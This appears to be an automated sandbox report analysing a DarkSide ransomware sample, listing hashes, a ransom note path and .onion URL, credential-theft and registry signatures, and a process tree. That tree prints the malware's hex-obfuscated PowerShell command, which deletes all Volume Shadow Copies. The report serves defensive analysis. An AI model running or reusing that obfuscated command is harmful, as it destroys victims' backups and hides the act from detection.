Analysis
-
max time kernel
143s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
28-07-2024 02:28
Static task
static1
Behavioral task
behavioral1
Sample
a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe
Resource
win10v2004-20240709-en
General
-
Target
a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe
-
Size
166KB
-
MD5
be1c18efa764b1b32421b6beb57cd3e9
-
SHA1
9fff40b4653ab368e04e398d9c54a1aa3a320d49
-
SHA256
a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774
-
SHA512
f35e3f123f4b0378626de52035390d2b8c9cf42f5b1882c66d8a79c58cd798a89506fb402a93a7ceaba1078226d7eba80e9c8a93321fc0a17e4e012fc8b15824
-
SSDEEP
3072:o/0Lu+FKdYM69P6padn/DDonc8oOgajAnPvNHwcW0m1QTj:o/d+FKdYMQPrdn/HovAnlwx0cC
Malware Config
Extracted
C:\Users\Admin\README.a65e00f8.TXT
darkside
http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Renames multiple (170) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Executes dropped EXE 1 IoCs
pid Process 4544 azami.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 3356 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\a65e00f8.BMP" azami.exe Set value (str) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\a65e00f8.BMP" azami.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language azami.exe -
Modifies Control Panel 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\Desktop\WallpaperStyle = "10" azami.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.a65e00f8 azami.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.a65e00f8\ = "a65e00f8" azami.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\a65e00f8\DefaultIcon azami.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\a65e00f8 azami.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\a65e00f8\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\a65e00f8.ico" azami.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3356 powershell.exe 3356 powershell.exe 4544 azami.exe 4544 azami.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 4544 azami.exe Token: SeSecurityPrivilege 4544 azami.exe Token: SeTakeOwnershipPrivilege 4544 azami.exe Token: SeLoadDriverPrivilege 4544 azami.exe Token: SeSystemProfilePrivilege 4544 azami.exe Token: SeSystemtimePrivilege 4544 azami.exe Token: SeProfSingleProcessPrivilege 4544 azami.exe Token: SeIncBasePriorityPrivilege 4544 azami.exe Token: SeCreatePagefilePrivilege 4544 azami.exe Token: SeBackupPrivilege 4544 azami.exe Token: SeRestorePrivilege 4544 azami.exe Token: SeShutdownPrivilege 4544 azami.exe Token: SeDebugPrivilege 4544 azami.exe Token: SeSystemEnvironmentPrivilege 4544 azami.exe Token: SeRemoteShutdownPrivilege 4544 azami.exe Token: SeUndockPrivilege 4544 azami.exe Token: SeManageVolumePrivilege 4544 azami.exe Token: 33 4544 azami.exe Token: 34 4544 azami.exe Token: 35 4544 azami.exe Token: 36 4544 azami.exe Token: SeDebugPrivilege 3356 powershell.exe Token: SeBackupPrivilege 4236 vssvc.exe Token: SeRestorePrivilege 4236 vssvc.exe Token: SeAuditPrivilege 4236 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 4268 wrote to memory of 4544 4268 a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe 84 PID 4268 wrote to memory of 4544 4268 a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe 84 PID 4268 wrote to memory of 4544 4268 a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe 84 PID 4544 wrote to memory of 3356 4544 azami.exe 86 PID 4544 wrote to memory of 3356 4544 azami.exe 86 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe"C:\Users\Admin\AppData\Local\Temp\a48af4ad3eddc63e3c079a43fd3b45d5fa66fe22c78f32f97285c428d1f1f774.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Users\Admin\AppData\Local\Temp\azami.exe"azami.exe"2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3356
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4236
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD52d74f3420d97c3324b6032942f3a9fa7
SHA195af9f165ffc370c5d654a39d959a8c4231122b9
SHA2568937b96201864340f7fae727ff0339d0da2ad23c822774ff8ff25afa2ae4da3d
SHA5123c3d2ae3b2581ff32cfee2aedca706e4eaa111a1f9baeb9f022762f7ef2dfb6734938c39eb17974873ad01a4760889e81a7b45d7ed404eb5830f73eb23737f1a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
59KB
MD50ed51a595631e9b4d60896ab5573332f
SHA17ae73b5e1622049380c9b615ce3b7f636665584b
SHA256243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60
SHA5129bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5
-
Filesize
1KB
MD5d4e176b40c4ea17f4870c34fad926d6e
SHA12cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0
SHA2567ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c
SHA512feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471